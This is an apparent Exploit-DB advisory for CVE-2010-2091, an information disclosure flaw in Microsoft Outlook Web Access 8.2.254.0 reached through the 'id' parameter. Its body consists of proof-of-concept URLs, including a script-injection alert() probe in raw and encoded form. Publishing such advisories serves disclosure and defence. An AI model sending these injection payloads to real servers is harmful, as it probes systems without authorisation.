ad

Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure vulnerability



EDB-ID: 12728 CVE: 2010-2091 OSVDB-ID: 64980
Author: Praveen Darshanam Published: 2010-05-24 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

"Microsoft Outlook Web Access (OWA) version 8.2.254.0"

OS: Windows Server 2003

Internet Explorer 7

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

There is an information disclosure vulnerability in "Microsoft Outlook Web
Access (OWA) version 8.2.254.0".

The issue is with the id parameter.

Following are different exploitation techniques:

https://example.com/owa/?ae=Folder&t=IPF.Note&id=<script>alert("HHH")</script<https://example.com/owa/?ae=Folder&t=IPF.Note&id=%3cscript%3ealert(%22HHH%22)%3c/script>
>

https://example.com/owa/?ae=Folder&t=IPF.Note&id=

https://example.com/owa/?ae=Folder&t=IPF.Note&id=A



Best Regards,
Praveen Darshanam,
Security Researcher,
INDIA